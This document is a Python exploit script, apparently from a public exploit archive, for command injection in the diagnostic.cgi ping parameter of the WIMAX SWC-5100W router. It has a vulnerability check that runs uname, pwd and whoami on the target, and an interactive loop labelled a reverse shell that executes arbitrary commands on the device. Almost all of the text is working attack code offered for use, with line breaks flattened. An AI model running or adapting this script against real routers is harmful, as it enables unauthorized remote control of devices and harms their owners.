WIMAX SWC-5100W Remote Command Execution

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE# Vulnerability Name: Ballin' Mada# Date: 4/3/2023# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: http://www.seowonintech.co.kr/eng/main# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)# Tested on: Unix# CVE : Under registrationimport requestsimport random,argparseimport sysfrom colorama import Forefrom bs4 import BeautifulSoupred = Fore.REDgreen = Fore.GREENcyan = Fore.CYANyellow = Fore.YELLOWreset = Fore.RESETargParser = argparse.ArgumentParser()argParser.add_argument("-t", "--target", help="Target router")argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')args = argParser.parse_args()target = args.targetrev = args.reverseShelltestX = args.testExploitbanner = """ ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ ||B |||a |||l |||l |||i |||n |||' |||       |||M |||a |||d |||a ||||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__|||/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|                    RCE 0day in WIMAX SWC-5100W                 [ Spell the CGI as in Cyber Guy ]"""def checkEXP():    print(cyan + "[+] Checking if target is vulnerable" + reset)    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']    request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)    if request.status_code == 200:        print(green + "[+] Status code: 200 success" + reset)        soup = BeautifulSoup(request.text, 'html.parser')         if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):            print(green + "[+] Target is vulnerable" + reset)            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")            soup_validate = BeautifulSoup(uname.text, 'html.parser')            print(soup_validate.find(id="pwned").text)        else:            print(red + "[+] Seems to be not vulnerable" + reset)    else:        print(red + "[+] Status code: " + str(request.status_code) + reset)def revShell():    cmd = input("CGI #:- ")    while cmd:        try:            print(cmd)            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";")            resp = BeautifulSoup(uname.text, 'html.parser')            print(resp.find(id="result").text)            if cmd == "exit" or cmd == "quit":                print(yellow + "[*] Terminating ..." + reset)                sys.exit(0)            else:                return revShell()        except KeyboardInterrupt:            sys.exit(0)def help():    print(    """ [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv[*] -t, --target :: Specify target to attack.[*] -rv, --reverseShell :: Obtain reverse shell.[*] -tx, --testExploit :: Test the exploitability of the target.[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.    """    )    if target and rev:    print(banner)    revShell()elif target and testX:    print(banner)    checkEXP()else:    print(banner)    argParser.print_help()